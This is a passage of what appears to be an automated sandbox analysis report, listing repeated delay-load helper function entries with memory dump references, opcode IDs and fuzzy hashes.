                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                            • String ID:
                                                                                            • API String ID: 1269201914-0
                                                                                            • Opcode ID: 4c788bda37d3b37c4311179d40064f8e148aacd927bb73d61428816392dc7bec
                                                                                            • Instruction ID: f76b5f4d3525e3ae38a3ba50d94038841cc1730e135df705bd1625a64fe2b939
                                                                                            • Opcode Fuzzy Hash: 4c788bda37d3b37c4311179d40064f8e148aacd927bb73d61428816392dc7bec
                                                                                            • Instruction Fuzzy Hash: BBB012EE3DC100BC3D44E14E1D02C37017CF0C4B20330463EF806C0090D8407C000631
                                                                                            Function 00A4E1F6 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00A4E1E3
                                                                                              • Part of subcall function 00A4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A4E8D0
                                                                                              • Part of subcall function 00A4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A4E8E1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                            • String ID:
                                                                                            • API String ID: 1269201914-0
                                                                                            • Opcode ID: de3a0d2318685b877ae345cd1d5ea95a8e19abca21e901f0b16493c08762aa67
                                                                                            • Instruction ID: e6c3c650cc7602c6aa5b378726257af334430ee2bb2fefeba293c8a37bbd2ed6
                                                                                            • Opcode Fuzzy Hash: de3a0d2318685b877ae345cd1d5ea95a8e19abca21e901f0b16493c08762aa67
                                                                                            • Instruction Fuzzy Hash: 9EB012EE3D9000BC3D44E6091D02C37017CE0C5B20330C63EFC06C0180D840BC040531
                                                                                            Function 00A4E1D1 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00A4E1E3
                                                                                              • Part of subcall function 00A4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A4E8D0
                                                                                              • Part of subcall function 00A4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A4E8E1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                            • String ID:
                                                                                            • API String ID: 1269201914-0
                                                                                            • Opcode ID: 444c793bda30df4e688c4aba844b4ddd1f1dc4cbb8e877287947e1af65c704d5
                                                                                            • Instruction ID: 6118ac58c85c2ad5efc391299da92ac70202e29fd4c8c157c44d73ff4a0975a7
                                                                                            • Opcode Fuzzy Hash: 444c793bda30df4e688c4aba844b4ddd1f1dc4cbb8e877287947e1af65c704d5
                                                                                            • Instruction Fuzzy Hash: 7CB012EE3D8100BC3D04A14A1D02C37013CE0C5B203308A3EFC02C0480D840BC000431
                                                                                            Function 00A4E282 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00A4E1E3
                                                                                              • Part of subcall function 00A4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A4E8D0
                                                                                              • Part of subcall function 00A4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A4E8E1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                            • String ID:
                                                                                            • API String ID: 1269201914-0
                                                                                            • Opcode ID: 625526244fa5681afb53b754f175edc539288951d3fff8966c9591da41bd3013
                                                                                            • Instruction ID: 87751c89226a50a863886f3464d5e6d4b07e3916f918b3771ad77f97ac842406
                                                                                            • Opcode Fuzzy Hash: 625526244fa5681afb53b754f175edc539288951d3fff8966c9591da41bd3013
                                                                                            • Instruction Fuzzy Hash: E6B012FA3D8000BC3D44E1091E02C3701FCE0C4B20330863EF806C0080DD407D010531
                                                                                            Function 00A4E228 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00A4E1E3
                                                                                              • Part of subcall function 00A4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A4E8D0
                                                                                              • Part of subcall function 00A4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A4E8E1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                            • String ID:
                                                                                            • API String ID: 1269201914-0
                                                                                            • Opcode ID: 069168e9f5174e725abe2892f7253dce52737931dbdb96638219bce521af795c
                                                                                            • Instruction ID: cf598d37aa7b8b9b1f58228c9694aa346b2a9b09c7bdbffab2cec8fcd07580b7
                                                                                            • Opcode Fuzzy Hash: 069168e9f5174e725abe2892f7253dce52737931dbdb96638219bce521af795c
                                                                                            • Instruction Fuzzy Hash: 83B092AA298100BC2984A1091D06C36016CE0C4B20330462AB806C008098406D400531
                                                                                            Function 00A4E232 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00A4E1E3
                                                                                              • Part of subcall function 00A4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A4E8D0
                                                                                              • Part of subcall function 00A4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A4E8E1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                            • String ID:
                                                                                            • API String ID: 1269201914-0
                                                                                            • Opcode ID: 2fcb9eb1b399e440fd63f9141d11f940d2969bc865cf7e4281d3c82469ac49e2
                                                                                            • Instruction ID: 21fcf3e9e3aa95d6a8c0797281470f0d17ebdc0fe03027ad77fc6d20589fca1f
                                                                                            • Opcode Fuzzy Hash: 2fcb9eb1b399e440fd63f9141d11f940d2969bc865cf7e4281d3c82469ac49e2
                                                                                            • Instruction Fuzzy Hash: 0AB012FA3D8000BC3D44E10D1E06C37017CE0C4F20330463EF806C0080DC407E010531
                                                                                            Function 00A4E23C Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00A4E1E3
                                                                                              • Part of subcall function 00A4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A4E8D0
                                                                                              • Part of subcall function 00A4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A4E8E1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                            • String ID:
                                                                                            • API String ID: 1269201914-0
                                                                                            • Opcode ID: 0fbe83bb5f45e735f30a2ee55b414d3f85924abf8ec501bd22c7f9a2dda653eb
                                                                                            • Instruction ID: 377a98c09689b80f0672d8af29d848ffb4f51c453f09e9cea3eb2241c4ba5602
                                                                                            • Opcode Fuzzy Hash: 0fbe83bb5f45e735f30a2ee55b414d3f85924abf8ec501bd22c7f9a2dda653eb
                                                                                            • Instruction Fuzzy Hash: 18B012FA3D8000BC3D44E10E1D06C37017CF0C4F20330463EF806C0090D8407D000531
                                                                                            Function 00A4E200 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00A4E1E3
                                                                                              • Part of subcall function 00A4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A4E8D0
                                                                                              • Part of subcall function 00A4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A4E8E1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                            • String ID:
                                                                                            • API String ID: 1269201914-0
                                                                                            • Opcode ID: c7f22c5f7ed6880a518f4df50b0057019abaf208190d852c688212dcfae4ffeb
                                                                                            • Instruction ID: 690c3e63331f5ce8fb2fa3e196da726cf1def8302c7cf6118afa8bbaaa06d2ca
                                                                                            • Opcode Fuzzy Hash: c7f22c5f7ed6880a518f4df50b0057019abaf208190d852c688212dcfae4ffeb
                                                                                            • Instruction Fuzzy Hash: A1B012EE3D9140BC3D84E2091D02C37017CE0C4B20330873FF806C0180D8407C440531
                                                                                            Function 00A4E20A Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00A4E1E3
                                                                                              • Part of subcall function 00A4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A4E8D0
                                                                                              • Part of subcall function 00A4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A4E8E1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                            • String ID:
                                                                                            • API String ID: 1269201914-0
                                                                                            • Opcode ID: 6a049d37f82f5998ecb661a9f4560438c393be1625b8a2d5c57e470f6fc399df
                                                                                            • Instruction ID: b689806b20b60a6dda6b79081011654163013f149545203da44b3f9609161a83
                                                                                            • Opcode Fuzzy Hash: 6a049d37f82f5998ecb661a9f4560438c393be1625b8a2d5c57e470f6fc399df
                                                                                            • Instruction Fuzzy Hash: 6EB012EE3DD000BC3D44E2091E02C37017CE0C4B20330863EF806C0180DC507D090531
                                                                                            Function 00A4E21E Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00A4E1E3
                                                                                              • Part of subcall function 00A4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A4E8D0
                                                                                              • Part of subcall function 00A4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A4E8E1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                            • String ID:
                                                                                            • API String ID: 1269201914-0
                                                                                            • Opcode ID: f6844e0f4674d3cea2df35aa3a8b08a1064d23de618f4ded1c54c1e9e831e82d
                                                                                            • Instruction ID: 29cb8827dd65bf28c10de10f9b7047f2b05a2405b4d63a06fcbc70be0c3bb72f
                                                                                            • Opcode Fuzzy Hash: f6844e0f4674d3cea2df35aa3a8b08a1064d23de618f4ded1c54c1e9e831e82d
                                                                                            • Instruction Fuzzy Hash: C7B092AA298000BC2944A1091D06C36016CE0C5B20330862AB806C00809840A9000531
                                                                                            Function 00A4E264 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00A4E1E3
                                                                                              • Part of subcall function 00A4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A4E8D0
                                                                                              • Part of subcall function 00A4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A4E8E1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                            • String ID:
                                                                                            • API String ID: 1269201914-0
                                                                                            • Opcode ID: d6c348fa67f78f1328fa353f5ee1eedc1b4a6dbe38ccdc0f837b488c4b817aa1
                                                                                            • Instruction ID: 791efa1d2accf96dd5714efd7564d8ae6be434e0a44a9c48ed81d5a6dfcefa96
                                                                                            • Opcode Fuzzy Hash: d6c348fa67f78f1328fa353f5ee1eedc1b4a6dbe38ccdc0f837b488c4b817aa1
                                                                                            • Instruction Fuzzy Hash: 01B012EA3E9040BC3D44E1091D02C3B01BDF4C4B20330463EF807C0090DC407C000531
                                                                                            Function 00A4E26E Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00A4E1E3
                                                                                              • Part of subcall function 00A4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A4E8D0
                                                                                              • Part of subcall function 00A4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A4E8E1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                            • String ID:
                                                                                            • API String ID: 1269201914-0
                                                                                            • Opcode ID: b4e8d2a7014e0bc9f50efab59292c4762f94e7413bb91591656bfacb89072bbe
                                                                                            • Instruction ID: 68e17b6c5a141b0bb775e5e83b6a8068f603a394e825ad05923fa75d629c8c0c
                                                                                            • Opcode Fuzzy Hash: b4e8d2a7014e0bc9f50efab59292c4762f94e7413bb91591656bfacb89072bbe
                                                                                            • Instruction Fuzzy Hash: 69B012EE3D8000BC3D44E1191D02C3701BCE0C5B20330C63EFC06C0080DA40BC000531
                                                                                            Function 00A4E246 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00A4E1E3
                                                                                              • Part of subcall function 00A4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A4E8D0
                                                                                              • Part of subcall function 00A4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A4E8E1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                            • String ID:
                                                                                            • API String ID: 1269201914-0
                                                                                            • Opcode ID: 8945e3bd4bf1dba1df9c069a667b89c1ca1d28c462ec449154fb649a1a88cadb
                                                                                            • Instruction ID: e4600793ab25860fec8d948340df51a43e2635a4a8eec830815e17dd5085a5e8
                                                                                            • Opcode Fuzzy Hash: 8945e3bd4bf1dba1df9c069a667b89c1ca1d28c462ec449154fb649a1a88cadb
                                                                                            • Instruction Fuzzy Hash: 1FB012EE3D9040BC3D44E1091D02C37017DE0C5B20330863EFC06C0080DC40BC000531
                                                                                            Function 00A4E250 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00A4E1E3
                                                                                              • Part of subcall function 00A4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A4E8D0
                                                                                              • Part of subcall function 00A4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A4E8E1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                            • String ID:
                                                                                            • API String ID: 1269201914-0
                                                                                            • Opcode ID: a9b6315594139446e9e29d616ee536fa7eee4d40efdb440324dda04fbea6fe48
                                                                                            • Instruction ID: af3a51c879328ca5a9854a0b95ab5f9a941d40cd0d227a9b519a677996de4137
                                                                                            • Opcode Fuzzy Hash: a9b6315594139446e9e29d616ee536fa7eee4d40efdb440324dda04fbea6fe48
                                                                                            • Instruction Fuzzy Hash: 24B012FA3D9140BC3D84E2091D02C37017DE0C4B20330473FF806C0080DC407C440531
                                                                                            Function 00A4E423 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00A4E3FC
                                                                                              • Part of subcall function 00A4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A4E8D0
                                                                                              • Part of subcall function 00A4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A4E8E1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
